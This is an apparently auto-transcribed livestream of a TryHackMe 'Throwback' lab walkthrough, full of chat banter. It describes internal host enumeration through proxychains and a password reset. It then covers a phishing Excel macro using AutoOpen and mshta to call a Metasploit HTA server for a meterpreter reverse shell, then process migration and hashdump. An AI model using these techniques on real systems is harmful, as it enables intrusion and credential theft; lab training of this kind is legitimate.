SQL service. mysql377570... uh, I forgot that number. 337570. Gotcha. Alrighty. "You're five minutes late." Oh goodness. After doing everything that you can with your initial footholds, your team thinks it is time to look at other resources and services that we have opened while moving through the network. Since these are internal servers, we will need to run your browser through a proxychain with FoxyProxy to forward your traffic through the proxy server. We can use CME again, along with the proxy server, to find all open servers. Run CME again to find what devices are open. Well, we ran the ARP scanner to see all the machines. Yeah, ImAlpha, dude, you didn't even see what we were doing the other day. We had a Monster. We had two Monsters in the day. I opened the second one at, like, one in the morning. So we're different long-haul. It's 3:30 AM where you guys are. So we do have that Throwback timekeep server. Um, I do remember this timekeep email. We should go find that box, though. Which of these is the timekeep? I mean, like, an internal-hosts.txt file, and then let's clear out all these guys. Um, and let's actually make each of these new lines a comma. I don't think I need to care about .1, though, or the .255, because that's going to be a broadcast. So let's proxychains nmap -v all of these, to... uh, god, what? I can normally get a hostname with SMB, right? So if I were to use -sC and -sV and specify port 445, I should at least maybe... it should be able to get me a hostname, I think. That's a fair assumption. And then if I use -o, I can save this in nmap-internal, right? Let's try it. Some of these closed. Was that useful whatsoever? I honestly don't know. Can I smbmap? Probably. Is the network down again?
I don't think so. I should extend it, though, if I have 45 minutes left. We'll amp that up. He's still running, and I don't need that dashboard in the way. I would have expected something to respond, though. Is my nmap syntax wrong? Let's just use one of these. And I don't need to do that. What if I did it? Yeah, we could do the whole subnet, but that would just take forever, right? multi/gather/resolve_hosts, what does that do? Oh, that's true. If I'm looking at just one port, it probably wouldn't take all that long. I'll spin it up, use that /24, and see if we actually get any hits. Uh, that might not be what I need in Metasploit. I'm trying to see what I could do to get some of the SMB names. Can CrackMapExec do that? "CME get hostnames with SMB." Yeah, I'm looking for timekeep. Sorry, I'm trying to find the machine that it is. I'd like to be able to smartly go ahead and figure out... does it really? Even if I specified, like, all the IP addresses? If I don't supply anything to CME, does it just, like, look at things? Let me try. Let me just try it and find out. /opt/CME smb. And it didn't do anything because it needs arguments, I'm assuming. I'm gonna sneeze, stand by. Thank you for notifying me that I'm still muted. I'm not good at this. Well, now we're, like, looking at stuff, I think. You know what is an even better idea? Is to nmap these on port 80 and see which of them actually will tell me their title, and which of them will tell me, like, "hey, this is the timekeep program." That's another option, and we could probably use the... Tag is oh true netcat... we'd have to do, like, a stupid GET thing, though. What is the raw netcat... like, what is the raw HTTP GET request? I genuinely don't know off the top of my head.
It's like "HTTP/1... GET /" or something. Uh, if I do this on 10 200 two 84... 183 was the... was 183 the firewall? 138. I was super close. "Can't you get it from PowerShell, from the machine you already have on the domain?" Uh, maybe. What are you envisioning? How is that a quick one-liner thing in, like, PowerShell, that you're thinking? Is that how it's done? HTTP GET request, domain DNS... I'm not understanding what you're thinking. Sorry. Yeah, you did an extra newline in there. grep title. Incredible. cat internal-hosts, while read line, do echo the thing into the thing on that internal host, grep for title, and do the done. Some of those might fail, so let's do a timeout of one second, and let's echo the line each time that we do that. "Why PowerShell? Resolve-DnsName 10." Oh. Oh, I now understand, relatively, what you're saying. Resolve-DnsName 10 224 117... does that do a thing? Throwback... oh, it gives me a little hostname. Okay, cool. And now I understand. So there are a few of these. 79. Can I supply multiple here? Or is that going to be weird? Yeah, I could do, like, a while loop if I wanted to, but... and this might take a little bit. "You can dump AD DNS from a regular user, commas in between." Oh, yeah, I guess that's where they try to... We'll do that after this one, if it comes back. We'll see if this one will respond. No. Do I need to set, like, a domain name or a domain server for the thing to use, rather than just what it's already using? Trying with commas. That didn't like that. 176. The DC. It responded. Yeah, ooh, nice. Okay, very cool. That found THROWBACK-TIME. THROWBACK-TIME is 176. We got it. So what the heck is going on on that thing? I would need to be able to access that through FoxyProxy. So I do need to use the SOCKS4 proxy, and the proxy server is running. I can proxychains curl that IP address, and that will work. So if I am doing it within Firefox, will that work? It does. Nice.
Oh, that's awesome. Cool. I actually haven't been able to do that before. Like, I've done obviously a decent amount, at least a somewhat amount, of pivoting and autorouting and port forwarding and SOCKS proxy stuff between a lot of the eLearnSecurity certifications, but funneling it through FoxyProxy is nice, because you can actually see web pages. With this in mind, we do know that we have access to the change-password functionality, and we saw that in mail, and I think we saved the... yeah, we saved the URL. So let's actually add this into my /etc/hosts file. So you don't know, it's the /etc/hosts, and we have 10 224 176 with timekeep.throwback.local. So now I should be able to go to that location and it will load just fine. And back in Sublime Text we have this, and I can get to Murphy or specify a password just like that. Like, literally making the GET request, I think, will change the password. So before I do that, I want to make sure that's really what I should be doing. Yep. "From the email we get, the link is a virtual host. The timekeep server, to access it, we need to set our /etc/hosts file." Great, I've done that. "After updating our hosts file, we can navigate to the link and reset a user's password. What is the hostname of the device?" THROWBACK-TIME, is that what you mean? Yep. What is the title? Throwback Hacks Timekeep. Throwback Hacks Timekeep. Dunzo. "What user was the password reset for?" Oh, they did it for MurphyF. We got it, cruising through. All right. "After doing everything that you can do with your initial footholds..." Didn't we just read that exact sentence? Yes, okay. Word to your mother. I don't know what that's from, other than Mother, the video game, right here. From what I understand, EarthBound. Is that right?
Ness and Lucas. "After doing everything you can with your initial foothold, your team thinks it's time to look at the resources and services we've opened while moving through the network. Part of this question will require a valid credit card or debit card, or access to Excel." Excuse me? What? Why do you need my credit card? "Picture this: you're a manager for one of the top accounting firms in the United States. As you walk across the floor, you notice one thing in common: every device has the Microsoft Office suite installed. This shouldn't be any surprise to you; as reported in Microsoft's 2019 report, Office 365 has 180 million users. For an attacker, this is an extremely large attack surface. As an attacker, all you need to do is get one person to click." Oh, Skid, hey, what's up? Hey, Skiddy. Yes, I realize, okay, it's saying you need access to Excel. Uh, and I should be able to... "downfall of an organization." Not my actual cracker. I follow. I'm good. "To start, we'll cover creating a simple macro, and this scenario will be using Excel. After that, we'll move on to creating a malicious macro." So I have been doing this a little bit with eCPTX, or the eLearnSecurity Penetration Testing eXtreme, and I've been doing that on my other machine here, because this is my X1 Carbon ThinkPad Lenovo thing. So that's running Windows, and I was able to get Excel and PowerPoint and stuff on that, and I've been using Luckystrike, because I was exploring... I would tinker around with, like, doing Visual... oh, thanks.
Yeah, Luckystrike bowling, I get that. Luckystrike GitHub or whatever. And there are some guides and documentation for it, but I've been doing some Visual Basic stuff to be able to figure out and learn how to write one of the macros on my own and have some fun with it. But I also just take a look at Luckystrike, which will go ahead and, like, create and put together this macro for you. It sounds like you can just as easily do that with msfvenom, as this suggests and recommends. So if it's totally cool with me skipping down, it says here, "If none of those options work for you, scroll to the section on generating macros with msfvenom." We might do that. I'm running Linux, obviously, so I don't immediately have access to Excel on this machine specifically. I'm just kind of reading what they're using here, though. Starting up a PowerShell command... "So let's say we want to step it up a notch and require the user to not interact with the macro to trigger the remote connection. Is this possible? Yes." Easy. Next question. "Am I going to switch to zsh anytime soon, John?" Yeah, I'm doing it right now, obviously. Why didn't you say so earlier? Oh god, I don't want to do this thing. Yeah, curl a completely arbitrary, random online web location. zsh. sudo apt install zsh. There you go. This is prime Twitch chat taking advantage of the ability to completely distract the streamer at any point they want. zsh, zsh. Check it out. Now I'm running zsh. All right, sweet, back to what we were doing. All right, we got John to install zsh now.
It's time to do some binary exploitation. We'll do some, like, fun ROP Emporium after this. Yeah, I should get Oh My Zsh and make this a lot more pleasant than just the random weird percent prompt, but we're doing this right now. We're learning about Visual Basic code to write malicious macros. Uh, we're gonna press the "I believe" button on this, because I know that I need Microsoft Office, and that is on this other machine, and I would set up, like, Remote Desktop or, like, some VNC thing to be able to do that, but I don't have that set up right now, and I don't want you to be bored not being able to see that. So they're using mshta, the HTML application. "Generating macros with msfvenom: alternatively, you could just make msfvenom do this whole thing for you." Yeah, uh, I think I saw someone make a little pull request for using the stabilized shell scripts from the Poor Man's Pentest. Um, it's... you just need to put fg and the stty raw -echo commands on the same line, separated by, like, a semicolon, for some reason. That's what you got to do to get your netcat-stabilized stuff to work. But, uh, okay. So all you really need to do is create a malicious macro with the VBA format. Yes, Jackson, this is saying, "keep this in mind: this only creates the Visual Basic script code," not the macro... like, the macro code, not the Excel itself. Yeah, oh sweet, good call. Venom, and yeah, is the... "Oh My Zsh column and row size." That would be very good to have. Do I need to be able to have Excel to be able to do this?
Right now, I guess I can, like, go install Microsoft in the virtual machine that I have, but, like, when we tried to open up the virtual machine in the last stream and video, it was like, whoa, it wouldn't load a darn thing. So we can try it, and I guess I'll fire up this machine that's beside me. Oh, no. Hey, welcome, Abdud a Dubs. Forgive me for not knowing how to say your name. I don't know the easy way to just go ahead and turn on Terminal Services for this other machine that I could connect into, but, uh, it would be at a different resolution and stuff would just be kind of funky. So let's not do that. Let's see if our virtual machine will behave, and let's find out if we actually even need to do this. Optional... welcome back. Yeah, we're gonna figure out if we can do some macro stuff, because sure, we could make msfvenom create, like, the Visual Basic script, but I still need to package it into an Excel file, and I'm on Linux. So I've done this, and I do this in eCPTX, or the very, very start of the eLearnSecurity Penetration Testing eXtreme. "What web server accepts xlsm as file uploads?" What? What did we talk about web servers whatsoever? Okay, where's this coming from? Oh, I didn't log in to timekeep. Yeah, is that this thing? Is it THROWBACK-TIME? Yeah, fine. Thank you. Appreciate it, Jackson. "We should set MurphyJ's password to password." Thanks, and I got a flag. All right, let's keep that in mind. Put it in the README here. I don't know what number this is, so let's go find out real quick before we go crazy. Throwback Time is number 10, so save that. And we don't need Luckystrike now. We go ahead and log in with MurphyF with all-caps PASSWORD as our password. Incredible. So we can upload a timecard. Pardon me, it wants to save this password so I don't forget, but... this is a link, and we need an upload, timesheet.xlsm. Okay, looks like that is what I should have been looking at for this next session. "What page is the file upload in?"
That is in timesheet.php. "What is the name of the xlsm that you can upload?" timesheet.xlsm. Incredible. Do I need to go ahead and make this thing to get onto the box? Yeah, it looks like we do. Okay, so let's try and make this Excel file, I guess. Let's get ready to install Microsoft Office in a virtual machine. All right, Excel. Painstakingly slow Windows virtual machines, Microsoft Office... Yeah, he's like, "oh boy, strap in, boys, this should be fun." This is moving at 10 frames per second. The virtual machine is... please scroll down. I'm moving my mouse to scroll down. Can I just download it, please? Or is there a download button? Buy now. Buy high, sell high, perform business transactions while high. That's a joke that we say a lot. Yeah, this is the equivalent of running hashcat on the XPS. It's like, no. We're trying to run a Windows 10 virtual machine, exactly. I just want the download link. Frequently asked questions... where's the download? Is it because I'm on Google Chrome? Will it only display if I'm running Edge? "Get Office." No, no, no, go back, go back. I want the "Get Office" button, and I want to actually be able to get Office. Jackson, this is sending along.
Hey, I didn't try this earlier, but if you want to give it a go, this looks like EvilOffice, which will be able to create an xls or Excel file with a macro. Does it have any examples, like a docx file or anything that I can just put stuff in? No, it doesn't look like it. I feel like this would work, but it looks like it needs to have an original docx file. I mean, I can just, like, find something, like, look at anything on the internet and just make a regular docx file, but... "You took me back to the exact same page you were on earlier." I'm glad we're doing this as a stream, because I would hate this as a video, or I'm, like, just functionally not functioning right now. "You can use Excel Online for free." Genius. Excel Online. I don't need to do that in the stupid virtual machine. Excel Online, or maybe, like, Google would be able to do it. You can tell it's Excel because it's a grid. What is happening? No, no, no. Everything's no. Just give me Office, Excel. Yeah, Google Docs can probably do it. We're going... we'll do macros in the online version. I don't think it will, but we could download this Excel file that it will give us, and then we could pre-plan it in with that little EvilOffice, maybe, like, as an option. Yeah, just download the xls file. Book1, the holy Book1.xlsx. What was in that Downloads folder? Was there anything sketchy? Making sure they're not... make sure there was nothing bad as I open that up. This is the risk of me doing a stream, right, is that when I open up my file systems of, like, my actual machine, there's nothing weird. This is a picture that I made to invite my friends over for a weekly Friday, a weekly Pizza Friday, get-together. So it was a good meme. It was a good joke. We had a great time. Yeah, tell your friends, come on over for Pizza Friday. Yeah, yeah, Nightwolf's like, "whoa, that looks great, John. You're an artist." All right, we're doing TryHackMe. That's what we're doing. Enough, enough distractions. Let's do, uh, like, a macros folder.
Let's slap that in there. Yeah, I'll tell everybody, Excel. So now I'm using zsh to make everyone happy, but I'm no longer able to make myself happy. Uh, we'll go into that macros directory and we'll use msfvenom with the payload... Oh, keep in mind, this is not an xlsm file. You're right. It's crippling. "Can you save a copy to OneDrive?" Can I, like, change the file format? xlsm is just one with macros enabled, is it not? Macro-enabled spreadsheet. Can I just, like, enable macros and then change it? Data... where do they put those? Insert... It's probably not going to work in the online one, honestly. "Solution is to run Windows at all times." Download Excel. Go to download. I don't want to buy it. I just want to download it. No, I don't want to participate in your surveys. Try one month free. I'm pretty sure I actually bought it already earlier, like, while I was doing the course for eCPTX. I was like, yeah, fine, whatever, take my money, Microsoft, so I can run a singular attack. Yeah, thanks, Cryillic. "I see we're making John suffer again." "Does Ubuntu come with Open or LibreOffice?" Uh, it should come with one thing. "This offer is for new customers only." I don't care. Can I download, please? Yeah, you aren't sorry. So we have a LibreOffice Calc. Will that be able to, like, save it as an xlsm? Oh my gosh, it can. Theoretically, it can save it as an xlsm file. So I'm going in the wrong directory because I am having a lobotomy from my inability to make an Excel file. Excel, do it. I don't care, use that format. Move that bus. ls, rm excel.x... file excel: Microsoft Excel 2007, theoretically with macros enabled. We're going on, uh... we're kind of going on a trip here. We're kind of really rolling the dice to see if this EvilOffice thing will also even work for us. So proxychains, you don't need anymore. Oh, that probably had some cool output that would have been good for me to look at, but it's over now. So, and I don't need that HTTP server over there, and I don't need that shell.
So let's kind of move this a little bit, and let's hop over to /opt and git clone EvilOffice. Let's see if we can get this to work. python3... that's a number two. EvilOffice... what? Why would you even have that? If you have EvilOffice, if you have Windows, you would need to use that tool. Are you just checking that with, like, os? No, you're good. You're good. You didn't know. That's not like any of us actually read the source code for the open-source project that we're looking at on GitHub. It's okay. Yeah, yeah, yeah. Can I just make a macro in LibreOffice? Internet: will LibreOffice macros run on Excel? Macro... Yeah, I would agree. I would think that this probably wouldn't work. Worth a try. But I guess we'll just continue to flail around aimlessly on the Microsoft website and try to download this. office.com. Oh my gosh, an actual install button. Will it do it? "Install Office on all of my computers." Give me them all. Put it on my Android phone. Don't actually. Yeah, dude, absolutely, Vantaman, if you want to pull request that, absolutely. Install all of Office. Isn't that the only way to do it? Is there... there's no... someone, someone... is there just an "only get Excel" option? Please. That's the thing. I feel like you have to download the entire gosh-darn package. We're gonna again spend another hour and a half just waiting for Office to install. While this is happening, I could try and VNC into this other machine, or get, like, TeamViewer or something installed on this. I think you can... yeah, I can just RDP. Yeah, I need to enable it. Remote Desktop settings, enable Remote Desktop, confirm. Did he do it? What's the IP address here? Close, close, close, close, close, close all windows on the separate computer that you can't see. Close, close, close, close. Keep going, Office.
You keep trying to do your own thing. ipconfig. My IP address. Let's see if that'll work. Let's do the Remmina. See if we can RDP to this guy. I accept. And that needs an initial... why? That user is fine. That user is allowed. Yeah, just a moment, just a Windows moment. That's a thing. It's, like, crippling for me to work in a Windows thing, and I mean, I need to obviously practice and get better at it, but it's like I should have a Windows-ready environment. And that's why I, like, literally ran Windows on my machine for a little bit, because I kind of wanted to just have it and get better at it and do WSL things. But that didn't work. I mean, it would just kind of... it would hinder anything else that I actually tried to do that was relatively somewhat interesting. Do I need to, like, reboot this after I've enabled it, for some reason, because it's Windows? Yeah, yeah, people that are watching the previous video are like, "cool, this is perfect. I actually have time to watch the other thing." This is going to take an eternity. Yeah, I feel like a normal thing would be... I guess normal people would run Windows as their host and then their Linux VM in VMware. But I just dislike that, because I just have a much better experience on Linux, and I just use that natively, or I try to, anyway. I'm gonna make sure this is the same IP address real quick. It gave me the, like, "let's finish setting up your device," and then I got really concerned. Like, did you just revert? Did you just, like, uninstall everything and reinstall Windows? Like, I don't trust you, anything. Well, our virtual machine is slowly installing Office, or downloading Office.
It's still going to take an eternity to do that. So another thing that is an option is using, like, my Elgato to try and get the screen capture of this device into the OBS screen recording, but that's janky, man. Fun fact: you can't RDP to localhost. It does not let you. I just wanted to test it. Enable Remote Desktop is on. Keep my PC awake for connections when it's plugged in. Uh, make my PC discoverable. Let's go to advanced settings. Nope. Do I need to, like, open that firewall port? Use the PC name to connect to it. Hmm. Let me at least kind of look on... Oh no, no, I mean, if... don't, like, feel sorry for me. I mean, I appreciate that. I'm just trying to scramble to think of a decent way to do this without making everyone, like, sit agonizingly waiting and bored. Benefit and drawback of doing a real-time stream. Office is going, and we should have it on my virtual machine, realistically. I've been using it on that other machine here, but I don't know why RDP just, like, isn't letting that happen. I don't know. Let me... they're on the same network. "You're open, man." Well, I am... where's my actual... 98. 98, yeah. So why was my name repeatedly in my prompt here? Let's tune in on our Windows machine. They'll be done in just a moment. It's done. We're gonna have to snapshot the crap out of this. We're past the two hours, guys. I think we would have gotten our achievement at this point. Recently added: Excel. Oh my god. Is now the time? Is this really when it happens? Have we finally come this far? All right, we got the Excel. What a time to be alive. Before I do goddamn anything, let me take a snapshot: "Installed Microsoft Office," with four F's, because it's gonna be a little bit slow. Sorry. So let's get this msfvenom thing rolling. Let's hop into the macros directory, and let's do our msfvenom -p windows/meterpreter/reverse_tcp. We'll set our LHOST to equal tun0. We'll set our LPORT to equal... what do we want?
What? Yeah, my machine does not like snapshotting, really. Sorry about that. What port, guys? We're doing some quads: 4224, that's the first one I got. It's happening. Now we just specify the Visual Basic script as macro.vba. Go. And I could use -o... Oh, you would use the HTA server? Oh, like instead of meterpre... Oh, so that way we could kind of like get back to it really smartly, can't we? Uh, you guys covered that, didn't you? Hmm, HTA doesn't get picked up by antivirus, man? Yeah, it's true, and I said venom's gonna get like crapped on. That's a good call. So let me justify myself in just slapping this code here. This is going to end up creating a macro, right? Sub will be a subroutine, or like a process or a function, that this Visual Basic code will run. AutoOpen, we'll call that sub, or that subroutine, that function. We've already defined that, and we'll be creating a new process running Shell. We're returning the process ID, and we'll use mshta, or kind of the Microsoft HTML Application interpreter for HTA stuff, on an HTA server that Metasploit will configure and work with us. c949, etc., etc. I'm getting pinged on Discord. So with that said, I have no shame copying and pasting this. We do however need to go ahead and create that HTA server. So we've got our Metasploit stuff running over here. Let's use hta_server. Now we've set that up, we can show our options, we can set LHORSE, excuse me, LHOST to tun0, set LPORT to 4224 I suppose. Um, what else did we have in here? That's kind of it, isn't it? LHORSE.
I'm glad you guys like that. Get out of here, actual virtual machine, now that you finally have Excel, and that's all that we do. That's literally it. Set up the HTA server and make it ready to rock. Okay. Run. Now you exist here. So let's make the macro ourselves. They use AutoOpen here. We need to make our IP address be what that's actually reaching out to, so we'll slap that in. And the code that we had used was just a Sub. There we go. And mshta will just call out and run that. So now we've got that Visual Basic script. Now we need to wait. Do we need to modify it? Do we need to change this whatsoever, the one that msfvenom used? I don't think so. Like, ours should just work. It's simple and stupid and easy because it's like four lines, but it'll work. It's worth a try. Sorry, I'm responding to messages on the Discord, was getting distracted. Yep, new green screen. We fear it. It's worth a try, be kind of fun to see how it looks, and it's kind of fun and cool with the chat up there. So, um, now that we have this Visual Basic script, we will want to create a new macro thing. So it's under Data, Insert, insert, insert macros. I can't stand dealing with Excel, I'll be completely honest. Let me just roll back to kind of where this all was. Creating a simple macro: create a new workbook and head over to the View tab, View Macros. Now I need to create a new one. What do we want to call it? We'll call it macro. Use LibreOffice? Well, right now we're doing this to make a little Excel macro that we'll use for phishing. What happened? Okay, HelloWorld will be the name of our function that'll invoke mshta. We'll reach out to our interpreter HTA file and... Creative, I'm glad you really like that macro name. They called it MyMacro. I'm just not trying to be as possessive. Slap it all in. PowerShell Invoke to download? We don't need to do that. We do want to just use the mshta to grab it and run it. So, return of the macro. Good jokes, guys.
You guys are crushing it over there. It's a stand-up comedy show. Okay, I think that's all we need. Is that not all we need? So I'm just gonna do it. Is there a way to save this as like... Let's try a proof of concept. Let's see if my victim machine will be able to get it. Um, timesheet.xlsm, with the macro-enabled one, done, right? So at that point I have this machine running over here. I have this mshta server started. I can see that with jobs: mshta server, he's running. He's waiting to catch some good stuff there. So far, to open this up I need to activate Excel. You shut your gosh darn mouth, I don't want to activate Excel. Can I X out of that? Oh my lord, Windows. "John makes me sad, he hasn't laughed at our task titles yet." The X, yeah, this X is trolling me. This whole button is trolling me. What the heck? All right, now it's gone. Now it's gone. Uh, I want it to run the macro though. Hello? mshta, is that Microsoft HTML Application? It has a better word for it. Uh, there's an actual thing: mshta, Windows to execute HTML applications, Microsoft HTML Application Host. Should this thing run? Should this thing kickstart? There we go: macros have been disabled. I don't care, do it, Enable Content. Microsoft Office has identified that this is evil. You suck, Defender. You suck. I'm trying to be evil. Should we just like fire this off? Should we just send it to them and see if it'll work? Oh, man. Who are we sending this to? We got our malicious macro, we got our religion... oh, no, we're just uploading it. That's all we're doing. And it's got to be timesheet.xlsm. Full send, full send, send it. All right, you convinced me. Let's remove that bad boy. Let's use the power of virtual machine Guest Additions and drag this file over, please, for the love of god. My gosh. Transfer the goddamn file, great. Now I have to deal with this. Now I have to deal with getting the file out of this stupid virtual machine. "John's amount of tabs gives me anxiety."
Look, you know what I can do? Check this out: if I hold down the Ctrl+W button, all of my problems go away. I don't know if I want to close Colabcat though, because we might need him again, as we tend to do. Drag and drop should be a thing. Uh, install Guest Additions. Oh my gosh, I really honestly thought that this already had that. That's the thing, I can't stand virtual machines. You guys know. Yeah, VMware honestly would be the better option. I used to use VMware, you guys probably have seen that in some videos. I don't think I have a license anymore. Please run. Yes, god dang it. Email it to yourself. VirtualBox over VMware because VirtualBox is free. What is going on? What is it? Is it VMware Workstation? VMware Player, VMware Player is the one that's free, isn't it? Yeah, use libvirt and KVM. Everything should be a Kubernetes container running on the blockchain. All of this just for a macro file, exactly, you got to do what you got to do. Kubernetes blockchain is the future, that's right. I'm glad you guys are having fun. I love you guys hanging out in the chat. Thanks for being here. We got to do this more often. What number Monster is that, I see ukdevolk19? This is still number one. This is still number one. It's beautiful though, because the green is being eaten by the green screen. Alrighty, let's see if we can, please for the love of god, transfer this file again now. Yes, this is a task continuation from last night. So we're doing Throwback from TryHackMe, and it is a long exercise. I don't think we actually have a ton left, but I mean, we probably do. Hello, atomic blackfish. We are doing Throwback from TryHackMe. Change the settings of the VM? I think it has both there. Hey, welcome everybody, I appreciate you coming to hang out. Yeah, I could set up a shared folder, and that's always a pain too, you know. Bidirectional is totally fine.
I don't know why I have three Command Prompt windows that just open up for some reason. Now can I drag this file over? I so, so wish I had like Impacket or something. Should we do this shared folder? Should we just stick and email it? Should I... This is just agonizing, guys. Oh, extend lab time, thank you, thank you, thanks for the reminder. We still got an hour and 25. Put it on G Drive or something, that's an option. From the top you get options for drag and drop: in Settings, Drag and Drop, Bidirectional. It's still on. Can I copy and paste out of the virtual machine into this? There's no way that's a thing. Maybe it's like just this folder. Maybe Nautilus is like, no, I don't want you to move those. Why is this spinning? What the hell is my cursor doing? Yeah, Krillix, don't worry, those command prompts are just me and my C2 agent. That's me running Starkiller. At least you guys are having fun. Oh shoot, yeah, maybe this is actually running SSH right now. That's a good call. Did it... it didn't copy it? How do I make sure that SSH server is running? How can I make sure that I can actually SSH into this? Yeah, just echo it into base64 and then copy and paste it. 10.0.2.15. We're gonna get this. We're gonna rescue this poor machine, this poor Excel file. Here's what we'll do: create a new folder. 10.0.2.15 is not it. Oh, yeah, this is true, this is true. Write out the file by hand. Can I make a shared folder? I guess I would need to change the network settings for that, would I not? You're right, this is NATed. So let's go bridged. I don't give a shit, give me a new IP address, please. Please, please, I don't want IPv6. Thank you, thank you, thank you. SSH this gosh darn thing, is SSH even a thing? Yeah, I need to install like Python on this thing. I'd love to be able to spin up the like Python HTTP server with upload and download enabled. Share this folder. Anyone can access it. Is "Everyone" like a thing?
Share. Yes. Great. You can email this or copy and paste the link. Uh, paste. Hello, hello. Paste, please. Okay, that's a thought. Now let's do SMB, 10 000242, john, with my password. Would that work? Oh my god. Am I still johnh on this thing? I think the username has to match the email, like the stupid Windows account email. Why is that a thing? There's no way. I don't get it, dude. Honestly, don't. Yeah, whoami would work. whoami. Just johnh, dude. Literally, put it on a flash drive. This is hell. What have we succumbed to? Dodge slash john? Why would that... I don't know, would that work? Yeah, it is a local account. No, no, no. Can I fucking install Python? I'll do that shit. Optional Features, is that how to do it in Windows? SSH, please. It's installed. Do the thing. snapdrop.net, that might do it too. I'm gonna try this SSH gimmick again. I actually hadn't seen that, like forcing it to turn on. Yeah, file.io would also be fine. End the suffering. Why do you have to install OpenSSH? I thought you just had it, man. You tell him. USB would work. Sort of. Python FTP server? Realistically this goddamn machine should have Python on it, so let's do that while SSH is doing its thing. Hey, check this out: on the Python web page there is a download button on the very, very first page, unlike microsoftoffice.com. Yeah, that's just true. I am just installing the client, so I might not be doing it right. Hold on. Yeah, just compromise my machine, Krillix. I don't know what you're waiting for. Everyone has been saying end the suffering. Hurry up and install Python, save us, save us, oh holy savior Python. OpenSSH Server is now installed. Is that a thing, like is it running? Can I SSH locally? How do I start it? I need to censor myself. This is the hysteria limit I'm almost at now. Is it literally... it's not Services on Windows, is it? What? No, uh, something crashed behind me. What is this Ubuntu thing?
Okay, whatever, whatever, Ubuntu. That's fine. That's fine. Python, hurry up, man. I need to add sshd. The internal server error is just me. SSH. OpenSSH Server, run always, start now. And now Python's done installing. It's probably not on my prompt yet, is it? Probably not. Okay, Windows, what is Microsoft Share? What the hell are you doing? It's ssh localhost. Yes. Oh my god. After all this time. Will it work on my host? Yes, yes. Now I need to use johnh, specify a password. Excuse me, that's literally the... Is the Microsoft PIN, is the Windows PIN different from a regular password? Or is it just a john that I need to use? What the fuck. What the fuck. I will absolutely do a stupid-ass password. We'll do a little "throwback", yeah. It's net user johnh throwback. Excuse me, open it up from the system prompts. This is agonizing. Okay, I'm done with this. I literally, I'm just gonna go to the Python method. I'm so sorry. We've wasted so much time together. I've grown like 30 years in age. How is this managed? I just want to get to like Environment Variables, please. Can I just get Advanced Settings? Please, System Properties. Your PC is monitored. Incredible. Does it just show up in the Start button if you search for environment variables? There it does. It sure do. Okay, Path. Dear god, Program Files. Where the foop is Python right now? Nope. It's in Program Files, Python? No, it should just be in C:. Where the fuck... we're in... Python installed to... We see Windows. Where did we tell Python to install to? Is where a command in Windows? Oh shit, it is. What the fuck. So Python isn't in my path? What? I can't do this much longer. This is... I'm at the end of my rope right now. We got to get out of this. We have to get this stupid freaking Excel file. We literally installed Python. Is it not there? Right now we're just trying to get a stinking file out of this virtual machine, because VirtualBox Guest Additions is just not letting it happen. Oh, does Windows have an FTP client?
That's a thought. What is a quick... Does it just type py? What the hell. Man, thank you so much. What the heck. All right, let's get out of here. Let's get out of Dodge, dude. We're going to johnh, we're going to the Desktop, we got our stupid Share folder, we got... I don't know, that's a timesheet.xlsm. Okay, great. So now let's py -m http.server, please, for the love of god, give me a web server. Okay, okay. Yeah, allow access on the firewall, totally cool. I was tweaking out because running python opened up the Microsoft Store. Oh, that's not Python. Okay, firewall, can you go away now? What the hell? We're here. We're here. We're at the home stretch. Oh my god, it's finally happening. We're gonna do it. It's done. 48 minutes. Oh my god. This should never, ever happen. Wow. Remember how we uselessly wasted time trying to run hashcat? Now we've uselessly wasted time trying to rescue a single file out of a virtual machine. I'm glad you're crying, because I'm crying too. Holy cow. What now? Where do I even go at this point? We got to get back to fucking Timekeeper. Log into this. If I drop a few more swears now, I'm sorry. Oh, it's "password" all caps, because that makes it more secure. Full send. Full send, everybody. Is our Metasploit thing still running? Do you think this will even work? Is it supposed to work? "Please stop swearing." CTF, TryHackMe. We know that this is going to be wrong, like there's no way that this is over. Upload the thing. Okay. "Your file timesheet.xlsm has been uploaded in ministry. We'll review it soon." So in that xlsm file we added a macro that would connect out to an HTA server that is running on my machine on port 8080. Right? Is that right? Or did we type 4224? Did we have the wrong port? The listener is running. I mean, I ran run. Yeah, he's doing its thing. He's got a running session, but now I'm a little spooked. Oh, we got one. Got a phish. Oh my gosh. It's done. Oh my gosh, 35 minutes. I'm in.
What a complete waste of time. That's right, Krillix. You gotta overreact and make sure it's fun for everybody. Now my meterpreter session is about to close, isn't it? I know how to do meterpreter things, I think. I hope so. Yeah, oh, that's true. Let me very, very quickly make sure that we have time. We got four minutes. Remind me in four minutes, chat, to go ahead and add some more time on our network. We need to be in a SYSTEM process, so we need to migrate to a new process. Who am I right now? I should be... I am a local administrator, apparently. That's awesome. Okay. I like to normally migrate to like winlogon, because I know that's a big boy. So let me migrate -N winlogon.exe and let's see if that succeeds. Fingers crossed. Cool. Now I should be able to run hashdump, and I got a lot of hashes. We got peanuts' account. Nice. Yo, Pyrute. We need to make a new folder. Let's move into hosts and make a directory for timekeeper. I should do this in CherryTree, and honestly, as I went through this more and more, and especially as I was thinking last night, I was like, dang, yes, the amount of READMEs is kind of insane and unreal, especially because... which we need. Timekeeper, we got timekeeper and that's the one that he's asking there. What's the user's hash? "What is the user's hash starting from the third colon?" So first colon, second colon. Do you mean like the entire rest of the string, or do you mean like the absentee thing? I think you want the one after that, like the actual hash. "What is the administrator's hash starting from the third colon?" That's this guy. What is Notion? Maybe we'll find credit card numbers to pay for our Excel, yeah. "What is the user's cracked password?" Um, we could hashcat it again if we really, really wanted to. Whoa. I feel like CrackStation should be able to solve this one. Yeah, do we still have our goddamn Colabcat that I closed while literally saying I probably shouldn't close this?
Oh, thank god. Maybe PentestWS? Yeah, no, that would be a good one too. Oh, you want me to use Notion. That's it. That's another good one. Okay. We can check that out. Nice. We're getting close. I'm gonna be doing some database stuff. All right, SQL. "Now that we have a foothold on the Timekeeper server we can begin to enumerate what information we can find from the server. We can assume it is running a SQL database somewhere because it had a login page. We can also assume the web server is running XAMPP from the xampp folder within the local disk. With this information we can easily find where the SQL database is stored and how we can access it. Now we're going to deep dive into a little bit of how MySQL and the SQL database works." Yep. Everyone's yelling at me to go ahead and add more time. Success. Sorry, you just got a profanity warning rule as John dropped 20 F-bombs. I'm sorry. Oh, sorry. Thanks, Shilpoi, if you chipped in for a VMware license. Thank you so much. I don't have any of the cool like bells and whistles announcements for like bits or things and things for Twitter. I need to get better at that, I need to get that started. Uh, one moment, I am being requested to go do something, so please forgive me. I need to drag this window up, put the children to bed. Do you stream on both YouTube and Twitch simultaneously? Uh, I don't think that is something that their terms of service is cool with, from what I understand. I am gonna ask for a bio break also 